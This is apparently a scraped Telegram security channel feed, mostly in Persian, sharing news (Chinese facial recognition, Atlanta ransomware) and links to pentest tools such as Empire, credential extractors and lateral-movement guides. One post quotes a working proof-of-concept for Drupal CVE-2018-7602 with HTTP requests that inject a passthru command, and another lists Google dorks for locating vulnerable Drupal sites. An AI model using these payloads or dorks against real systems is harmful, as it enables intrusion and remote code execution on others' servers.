امنیت اطلاعات

تکنولوژی تشخیص چهره (facial recognition) در چین به اوج خود رسید و پلیس این کشور موفق شد یک مضنون را در بین جمعیت ۶۰ هزار نفری یک کنسرت شناسایی کند!
پلیس اعلام کرد یک مجرم فراری ۳۱ ساله را در کنسرت Jacky Cheung شناسایی و دستگیر کرد.
دوربین های بخش بررسی بلیطها به تکنولوژی تشخیص چهره مجهز بودند و این فرد به خوبی توسط دوربین ها شناسایی شد.
چین در حال حاضر ۱۷۰ میلیون دوربین مداربسته دارد و ۴۰۰ میلیون دوربین دیگر نیز قرار است طی سه سال آینده به تعداد فعلی اضافه شوند.
اکثر این دوربین ها به هوش مصنوعی و تشخیص چهره مجهز هستند.

اطلاعات بیشتر:
https://www.hackread.com/police-locate-suspect-from-a-crowd-using-facial-recognition/

#facial_recognition
#china
#privacy

@sec_nerd

HackRead

Police locate suspect from a crowd of 60,000 using Facial Recognition

The fugitive was successfully identified from within the crowd of thousands of attendees through the facial recognition technology, which provided surprisingly accurate results.

310 views07:44

امنیت اطلاعات

اکسپلویت Drupal منتشر شد https://isc.sans.edu/diary.html #drupal #exploit #rce @sec_nerd

دورک های گوگل برای آسیب پذیری دروپال

inurl:"/user/register" "Powered by Drupal" -CAPTCHA -"Access denied"

inurl:"user/register?element_parents=account/mail"

inurl:"*drupal_ajax"

#drupal
#exploit
#rce

@sec_nerd

275 viewsedited 07:46

امنیت اطلاعات

8:18

This media is not supported in your browser

VIEW IN TELEGRAM

exploiting XXE in nokogiri library

#xxe
#xml

@sec_nerd

292 views08:03

امنیت اطلاعات

SQL Injection Cheat Sheet

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

#sqli
#web
#pentest

@sec_nerd

299 views08:30

امنیت اطلاعات

Pivoting through HTTP webshells with Tunna: SOCKS proxy webshells (ASP, PHP & JSP)

https://blog.secu.dk/blog/Tunnels_in_a_hard_filtered_network/

#pentest #proxy #pivoting #network

@sec_nerd

338 views09:12

امنیت اطلاعات

استخراج پسوردهای ذخیره شده در اینترنت اکسپلورر و edge

https://github.com/HanseSecure/credgrap_ie_edge

#windows
#edge
#browser
#ps

@sec_nerd

GitHub

GitHub - HanseSecure/credgrap_ie_edge: Extract stored credentials from Internet Explorer and Edge

Extract stored credentials from Internet Explorer and Edge - HanseSecure/credgrap_ie_edge

278 views16:58

امنیت اطلاعات

حرکات جانبی در شبکه های ویندوزی با استفاده از RDP

https://pentestlab.blog/2018/04/24/lateral-movement-rdp/

#windows
#network
#pivoting
#privesc
#lateral_movement

@sec_nerd

Penetration Testing Lab

Lateral Movement – RDP

The Remote Desktop Protocol (RDP) is widely used across internal networks by Administrators. This allows systems owners and admins to manage Windows environments remotely. However RDP can give vari…

258 views17:04

امنیت اطلاعات

شهر آتلانتا 2.6 میلیون دلار برای رهایی از یک باج افزار با نام SamSam هزینه کرده است!
این باج افزار که به جان سیستم های شهرداری این شهر افتاده است ابتدا درخواست ۵۰ هزار دلار باج کرده بود که پس از مدتی، پورتال پرداخت باج از کار افتاد.
تا کنون برای بازگردانی اطلاعات $2,667,328 پرداخت شده است!

https://www.wired.com/story/atlanta-spent-26m-recover-from-ransomware-scare/

#ransom
#ransomware
#usa

@sec_nerd

WIRED

Atlanta Spent $2.6M to Recover From a $52,000 Ransomware Scare

Whether to pay ransomware is a complicated—and costly—calculation.

265 views17:48

امنیت اطلاعات

وقتی دوربین مداربسته ضد آب هست اما ضد هک نیست!

https://www.exploit-db.com/exploits/39706/

#network
#iot
#ipcam
#cctv

@sec_nerd

295 views17:50

امنیت اطلاعات

انتشار نسخه جدید ابزار قدرتمند Empire https://github.com/EmpireProject/Empire version 2.5 #empire #network #msf #postExploitation @sec_nerd

نسخه گرافیکی ابزار Empire

https://github.com/EmpireProject/Empire-GUI

#empire
#msf
#network
#privesc
#backdoor
#post_exploitation

@sec_nerd

285 views18:04

امنیت اطلاعات

بازی طراحی شده توسط CIA از حالت محرمانه خارج شد.
این بازی که برای آموزش تحلیلگران CIA ساخته شده بود به تازگی از طبقه بندی محرمانه خارج و برای عموم در دسترس قرار گرفت.
بازی به این شکل است که بیش از ۱۵۰ کارت داریم و هر بازیکن باید برای هر دور، ایده هایی را برای خروج از بحران پیشنهاد کند.
بحرانها از جنس سیاسی، نظامی، اقتصادی و سلاح و ... هستند.

اطلاعات بیشتر:
https://www.kickstarter.com/projects/mmasnick/cia-collect-it-all

#cia
#Usa
#agents

@sec_nerd

Kickstarter

CIA: Collect It All

A competitive card game based on the CIA's declassified training game: Collection Deck.

544 views18:11

امنیت اطلاعات

تست نفوذ در اندروید با ابزار Hijacker
Aircrack-ng, Airodump-ng, MDK3 و Reaver

https://github.com/chrisk44/Hijacker/releases

#android
#wifi
#pentest
#network

@sec_nerd

288 views16:41

امنیت اطلاعات

This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.

You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).

POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]

Retrieve the form_build_id from the response, and then triggering the exploit with :

POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]

This will display the result of the whoami command.

Patch your systems!
Blaklis

#drupal
#exploit
#rce

@sec_nerd

278 views16:42

امنیت اطلاعات

رده بندی آسیب پذیری های سیستمهای صنعتی و نیروگاهی از دید کسپرسکای

#scada #ICS

@sec_nerd

228 views16:43

امنیت اطلاعات

اسکریپتهای پاورشل مفید برای انجام تست نفوذ در سیستمهای ویندوزی

https://github.com/rvrsh3ll/Misc-Powershell-Scripts

#ps
#windows
#network
#privesc

@sec_nerd

GitHub

GitHub - rvrsh3ll/Misc-Powershell-Scripts: Random Tools

Random Tools. Contribute to rvrsh3ll/Misc-Powershell-Scripts development by creating an account on GitHub.

256 views16:44

About

Blog

Apps

Platform